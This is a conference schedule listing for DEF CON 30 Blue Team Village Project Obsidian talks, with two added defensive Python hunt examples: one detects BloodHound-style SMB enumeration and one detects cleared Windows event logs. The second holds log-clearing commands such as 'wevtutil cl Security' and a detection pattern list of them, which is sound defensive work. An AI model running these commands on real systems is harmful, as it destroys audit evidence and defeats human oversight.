call-for-content-2022-207-obsidian-forensics-kill-chain-3-endpoint-forensics-walkthrough
en
Obsidian Forensics Station: In this pre-recorded presentation we will walk through the artifacts and analysis of the Obsidian Kill Chain 3 using forensics artifacts found on affected Endpoints.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/YYKCPF/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/YYKCPF/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian: IR - Final Reporting Made Exciting*
Project Obsidian (in-person)
2022-08-13T13:00:00-07:00
13:00
01:00
*Insert eye catching and compelling abstract on IR final reporting here. Make it seem exciting and not at all a dreaded yet critical part of incident handling.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-203-obsidian-ir-final-reporting-made-exciting-
en
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XTXX3Q/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XTXX3Q/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: Using Chainsaw to Identify Malicious Activity
Project Obsidian Short (in-person)
2022-08-13T14:00:00-07:00
14:00
01:00
When time is of the essence in IR, having a tool to quickly collect data from Windows Event Logs is the way to go. We'll LET IT RIP with Chainsaw, hosted by B4nd1t0 as part of Project Obsidian.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-211-obsidian-forensics-using-chainsaw-to-identify-malicious-activity
en
This talk is a short, in-depth look at using Chainsaw for investigations, using the Obsidian project as the example.
The intent is to go over the following:
- Default display to console
- Creating a CSV for slicing and to put into a spreadsheet
- SIGMA rules and how Chainsaw applies those rules
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/H9MR3T/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/H9MR3T/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: Creating a custom Velociraptor collector
Project Obsidian Short (in-person)
2022-08-13T14:30:00-07:00
14:30
00:30
Obsidian 4n6 Station: Pre-Recorded - Obsidian 4n6: Creating a custom Velociraptor collector
call-for-content-2022-210-obsidian-forensics-creating-a-custom-velociraptor-collector
en
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XR9GNT/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XR9GNT/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTH: Sniffing Compromise: Hunting for Bloodhound
Project Obsidian (in-person)
2022-08-13T10:30:00-07:00
10:30
01:00
Join us on a journey as we chase BloodHound through a compromised environment via host and network telemetry. We will dive quickly into detections to become better prepared for next time.
call-for-content-2022-224-obsidian-cth-sniffing-compromise-hunting-for-bloodhound
en
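As an added example (not material from the talk), one hunt that fits the host-plus-network framing above: SharpHound-style collection from a single machine shows up on the network as a burst of SMB sessions to many hosts, with LDAP to a domain controller in between, and on the targets as Security 4624 logon type 3 events arriving from the same source address. The flows, logon events, the threshold of 10 hosts and the 60-second window below are all constructed assumptions for the illustration and would need tuning against real baselines.

```python
from collections import Counter, defaultdict, deque

# Constructed telemetry, not real captures. Flows are (ts_seconds, src_ip, dst_ip, dst_port)
# as a Zeek conn.log might yield them; logons are (ts_seconds, computer, event_id,
# logon_type, source_ip, account) as parsed from Security 4624 records.
COLLECTOR, DC = "10.0.0.50", "10.0.0.10"
FLOWS = [(1000 + i, COLLECTOR, f"10.0.1.{i + 1}", 445) for i in range(12)]   # SMB to 12 hosts in 12 s
FLOWS += [(1000 + i, COLLECTOR, DC, 389) for i in range(0, 12, 3)]           # LDAP to the DC in between
FLOWS += [(1000, "10.0.0.60", "10.0.1.1", 445), (1500, "10.0.0.60", "10.0.1.2", 445),
          (1700, "10.0.0.60", DC, 389)]                                       # an ordinary workstation
LOGONS = [(1000 + i, f"SRV{i + 1:02d}", 4624, 3, COLLECTOR, "jdoe") for i in range(12)]
LOGONS += [(1000, "SRV01", 4624, 3, "10.0.0.60", "svc_backup"),
           (1200, "SRV02", 4624, 3, "10.0.0.60", "svc_backup")]

def smb_fanout(flows, threshold=10, window=60, port=445):
    """Flag any source reaching >= threshold distinct hosts on `port` within `window` seconds.
    Returns {src_ip: peak distinct destination count}. Threshold/window are assumptions."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == port:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, conns in by_src.items():
        conns.sort()
        live, seen = deque(), Counter()   # sliding window of (ts, dst) and distinct-dst counts
        for ts, dst in conns:
            live.append((ts, dst))
            seen[dst] += 1
            while live[0][0] < ts - window:   # expire connections that fell out of the window
                _, old = live.popleft()
                seen[old] -= 1
                if not seen[old]:
                    del seen[old]
            if len(seen) >= threshold:
                alerts[src] = max(alerts.get(src, 0), len(seen))
    return alerts

def corroborate(alerts, flows, logons):
    """Pair each network alert with host telemetry (4624 type 3 from the same IP) and
    with the LDAP traffic to the DC that directory collection needs."""
    findings = []
    for src, fanout in alerts.items():
        rel = [l for l in logons if l[4] == src and l[2] == 4624 and l[3] == 3]
        findings.append({"src": src, "smb_fanout": fanout,
                         "type3_logon_hosts": len({l[1] for l in rel}),
                         "accounts": sorted({l[5] for l in rel}),
                         "ldap_to_dc": sum(1 for f in flows if f[1] == src and f[3] in (389, 636))})
    return findings

def hunt(flows, logons):
    """Network fan-out first, host corroboration second: one finding per suspicious source."""
    return corroborate(smb_fanout(flows), flows, logons)
```

With the constructed data, `hunt(FLOWS, LOGONS)` yields a single finding for 10.0.0.50: twelve SMB targets inside the window, twelve servers recording a network logon from that address under one account, and four LDAP connections to the DC. The ordinary workstation never crosses the threshold because its two SMB sessions are 500 seconds apart. The account list is what makes the finding actionable, since it tells the responder which credential was used for the enumeration.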
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/R8WBNN/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/R8WBNN/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTI: Operationalizing Threat Intelligence
Project Obsidian (in-person)
2022-08-13T11:30:00-07:00
11:30
01:00
This module presents an overview of how threat intelligence gleaned from a single CTI report can be operationalized across an organization. We'll run through a report based on content from Project Obsidian's kill chain 3 and demonstrate how it can be operationalized by different teams (SOC, IR, forensics, security management, and executives).
call-for-content-2022-198-obsidian-cti-operationalizing-threat-intelligence
en
This module covers:
- Direction & Planning: Establishing CTI goals and objectives
- Collection: Objective is to review and operationalize a single CTI report
- Analysis & Production: Elements to identify in a CTI report
- Dissemination: Sharing takeaways from a CTI report with stakeholders
- Feedback & Evaluation: Methods for receiving feedback
Objective: Demonstrate how a CTI report can be operationalized.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/EUCS7V/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/EUCS7V/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian REM: Phishing In The Morning: An Abundance of Samples!
Project Obsidian (in-person)
2022-08-13T13:00:00-07:00
13:00
01:00
Coming soon
call-for-content-2022-218-obsidian-rem-phishing-in-the-morning-an-abundance-of-samples-
en
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZNJRVS/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZNJRVS/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTH: The Logs are Gone?
Project Obsidian (in-person)
2022-08-13T14:00:00-07:00
14:00
01:00
What happens when an attacker clears the logs in an effort to hide their tracks? Here we will dive into that question, build a Threat Hunting hypothesis, develop some ways to detect this activity, and document the process.
call-for-content-2022-226-obsidian-cth-the-logs-are-gone-
en
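As an added example, not content from the talk: three hypotheses for the question above, each written as a check over constructed Windows telemetry. The event layout, hostnames, record IDs and command lines are assumptions made for this illustration; the event IDs themselves (Security 1102 for a cleared Security log, System 104 for other cleared channels, 4688 for process creation) are standard Windows auditing.

```python
from collections import defaultdict

def _ev(ts, host, channel, rid, eid, **data):
    """Constructed, normalised event (not a real capture): `channel` is the log it was
    read from and `rid` its EventRecordID."""
    return {"ts": ts, "host": host, "channel": channel, "rid": rid, "eid": eid, "data": data}

EVENTS = [
    _ev("2022-08-13T21:00:01Z", "WS01", "Security", 51200, 4688, user="jdoe",
        image="C:\\Windows\\System32\\wevtutil.exe", cmdline="wevtutil  cl  Security"),
    _ev("2022-08-13T21:00:02Z", "WS01", "Security", 1, 1102, user="jdoe"),      # Security cleared
    _ev("2022-08-13T21:00:03Z", "WS01", "Security", 2, 4688, user="jdoe",
        image="C:\\Windows\\System32\\cmd.exe", cmdline="cmd.exe"),
    _ev("2022-08-13T21:00:40Z", "WS01", "System", 7731, 104, user="jdoe",
        cleared="Microsoft-Windows-Sysmon/Operational"),                        # another channel cleared
    # WS02: only the Security channel was collected, so the System 104 for the cleared
    # Application log never reached us; the process telemetry is all that is left.
    _ev("2022-08-13T21:10:00Z", "WS02", "Security", 77001, 4688, user="svc_backup",
        image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        cmdline="powershell.exe -NoP -C Clear-EventLog -LogName Application"),
    _ev("2022-08-13T21:10:05Z", "WS02", "Security", 77002, 4624, user="svc_backup"),
    _ev("2022-08-13T21:11:00Z", "WS03", "Security", 91000, 4624, user="asmith"),
    _ev("2022-08-13T21:11:30Z", "WS03", "Security", 91001, 4688, user="asmith",
        image="C:\\Windows\\System32\\notepad.exe", cmdline="notepad.exe"),
]

def direct_indicators(events):
    """Hypothesis 1: the act of clearing is itself logged. Security 1102 is the first record
    written after the Security log is cleared; System 104 names any other cleared channel."""
    hits = []
    for e in events:
        if e["channel"] == "Security" and e["eid"] == 1102:
            hits.append((e["host"], e["ts"], "Security", e["data"].get("user")))
        elif e["channel"] == "System" and e["eid"] == 104:
            hits.append((e["host"], e["ts"], e["data"].get("cleared"), e["data"].get("user")))
    return hits

# Command fragments that clear logs; whitespace is squashed before matching so that
# "wevtutil  cl" padding tricks do not slip past.
CLEAR_PATTERNS = ("wevtutil cl ", "wevtutil clear-log ", "clear-eventlog", "remove-eventlog")

def clearing_commands(events):
    """Hypothesis 2: the tooling leaves process-creation telemetry (4688 here; Sysmon EID 1
    would serve as well) even when the cleared channel no longer shows the act."""
    hits = []
    for e in events:
        if e["eid"] != 4688:
            continue
        cmd = " ".join(e["data"].get("cmdline", "").lower().split()) + " "
        if any(p in cmd for p in CLEAR_PATTERNS):
            hits.append((e["host"], e["ts"], e["data"].get("user"), e["data"]["cmdline"]))
    return hits

def record_id_resets(events):
    """Hypothesis 3: absence as evidence. EventRecordID only grows within a channel, so a
    value below its predecessor means the log was reset, whether or not the 1102/104
    record survived (for instance in a forwarded copy)."""
    by_log = defaultdict(list)
    for e in events:
        by_log[(e["host"], e["channel"])].append((e["ts"], e["rid"]))
    resets = []
    for (host, channel), recs in by_log.items():
        recs.sort()
        for (_, prev), (ts, cur) in zip(recs, recs[1:]):
            if cur < prev:
                resets.append((host, channel, ts, prev, cur))
    return resets

def hunt(events):
    """Run all three hypotheses and return their evidence side by side for the write-up."""
    return {"cleared": direct_indicators(events),
            "commands": clearing_commands(events),
            "resets": record_id_resets(events)}
```

On the constructed data, `hunt(EVENTS)` finds two direct indicators on WS01, a record-ID reset on WS01's Security log, and two clearing commands: the wevtutil run on WS01 and a Clear-EventLog on WS02 that nothing else in the collection reveals. That last case is why the hypothesis needs more than one check, and the collection gap it exposes (System channel not gathered from WS02) belongs in the documentation of the hunt as much as the hits do.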
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/7PMXR7/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/7PMXR7/feedback/
Main Stage (In-person)
Backdoors & Breaches, Back to the Stone Age!
Project Obsidian (in-person)
2022-08-14T11:00:00-07:00
11:00
01:00
A crowd-interactive, igneous take on the BHIS IR card game.
call-for-content-2022-219-backdoors-breaches-back-to-the-stone-age-
en
Don't flake early! There will be several rounds of well-punned games, all localized to Project Obsidian's kill chain data and the tools utilized. Learn how the fates will treat you with an incident on the line. Backdoors & Breaches is an incident response card game from Black Hills Information Security and Active Countermeasures. The game contains 52 unique cards for conducting incident response tabletop exercises and learning attack tactics, tools, and methods.
https://www.blackhillsinfosec.com/projects/backdoorsandbreaches/
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PYP7V3/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PYP7V3/feedback/
Main Stage (In-person)
Project Obsidian: Panel Discussion
Project Obsidian (in-person)
2022-08-14T12:00:00-07:00
12:00
01:00
Project Obsidian crew members talk about how they put it all together.
call-for-content-2022-220-project-obsidian-panel-discussion
en
- How Project Obsidian was put together
- Involving a global village
- Opportunities for mentoring
- A look behind the scenes of a CTF
- and more
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ANEWWL/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ANEWWL/feedback/
Main Stage (In-person)
Blue Team Village Closing Ceremony
Panel (in-person)
2022-08-14T13:00:00-07:00
13:00
01:00
Closing ceremony for Blue Team Village @ DEF CON 30
call-for-content-2022-221-blue-team-village-closing-ceremony
en
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/33FEUC/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/33FEUC/feedback/